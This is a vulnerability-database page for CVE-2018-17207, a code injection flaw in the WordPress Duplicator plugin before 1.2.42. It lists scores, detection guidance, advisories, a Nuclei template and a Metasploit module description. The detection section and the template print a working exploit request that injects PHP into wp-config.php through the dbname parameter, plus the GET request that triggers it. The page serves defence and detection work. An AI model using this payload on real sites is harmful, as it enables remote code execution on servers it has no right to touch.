CVE-2018-17207
published 2018-09-19CVE-2018-17207: An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can…
PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
57.56%
99.0th percentile
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awesomemotive | duplicator | < 1.2.42 | 1.2.42 |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /installer-backup.php HTTP/1.1
commandaction_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=wordpress');echo base64_decode($_GET["input"]);//&dbport=12345&
path/wp-config.php
cookiedupx-header-version
- →Detect exploitation attempts by monitoring HTTP requests to leftover installer files /installer.php and /installer-backup.php on WordPress installations ↗
- →Look for POST requests to /installer-backup.php with parameters action_ajax=3&action_step=3 and a dbname value containing PHP code (e.g., single-quote followed by PHP statements) as a sign of active exploitation
- →Fingerprint vulnerable Duplicator plugin instances by checking for the HTTP response header/body string 'dupx-header-version' and 'Deployment Path:' with HTTP 200 status
- →Flag WordPress sites running Duplicator plugin versions earlier than 1.2.42 as vulnerable
- →Monitor for unexpected modifications to wp-config.php, particularly injection of PHP code, as the exploit overwrites this file with attacker-controlled content ↗
- →Check for subsequent GET requests to /wp-config.php with a base64-encoded 'input' query parameter, which is used to trigger the injected PHP payload after exploitation
- ·Exploitation WILL corrupt/overwrite wp-config.php; defenders should be aware that a successfully exploited site will have a broken WordPress configuration and should restore from backup ↗
- ·The vulnerability only exists when leftover installer files (installer.php, installer-backup.php) remain on the filesystem after a backup restoration; sites that have cleaned up these files are not exposed ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-4hvf-vmqm-x8p3: An issue was discovered in Snap Creek Duplicator before 1
ghsa_unreviewed·2022-05-13
CVE-2018-17207 [CRITICAL] CWE-94 GHSA-4hvf-vmqm-x8p3: An issue was discovered in Snap Creek Duplicator before 1
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
VulnCheck
awesomemotive duplicator Improper Control of Generation of Code ('Code Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-17207 [CRITICAL] awesomemotive duplicator Improper Control of Generation of Code ('Code Injection')
awesomemotive duplicator Improper Control of Generation of Code ('Code Injection')
An issue was discovered in Snap Creek Duplicator before 1.2.42. By accessing leftover installer files (installer.php and installer-backup.php), an attacker can inject PHP code into wp-config.php during the database setup step, achieving arbitrary code execution.
Affected: awesomemotive duplicator
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duplicator/duplicator-1241-sensitive-information-disclosure-leading-to-remote-code-execution
No detection rules found.
Nuclei
WordPress Duplicator Plugin < 1.2.42 - Arbitrary Code Execution
nuclei·CVSS 9.8
CVE-2018-17207 [CRITICAL] WordPress Duplicator Plugin < 1.2.42 - Arbitrary Code Execution
WordPress Duplicator Plugin Duplicator'
- 'dupx-header-version'
- 'Deployment Path:'
condition: and
- type: status
status:
- 200
- type: dsl
dsl:
- compare_versions(version, '< 1.2.42')
# - raw:
# - |-
# POST /installer-backup.php HTTP/1.1
# Host: {{Hostname}}
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# action_ajax=3&action_step=3&dbhost=nowhere&dbuser=test&dbpass=test&dbname=wordpress');echo base64_decode($_GET["input"]);//&dbport=12345&
# matchers-condition: and
# matchers:
# - type: word
# part: body
# words:
# - updt_rows
# - scan_rows
# - scan_tables
# condition: and
# - type: status
# status:
# - 200
# internal: true
# - raw:
# - |+
# GET /wp-config.php?input={{base64(marker)}} HTTP/1.1
# Host: {{Hostname}}
# Connection: close
# matchers-condition:
Metasploit
Snap Creek Duplicator WordPress plugin code injection
metasploit
Snap Creek Duplicator WordPress plugin code injection
Snap Creek Duplicator WordPress plugin code injection
When the WordPress plugin Snap Creek Duplicator restores a backup, it leaves dangerous files in the filesystem such as installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to arbitrary PHP code execution. WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit to make the WordPress site work again.
2018-09-19
Published
Exploited in the wild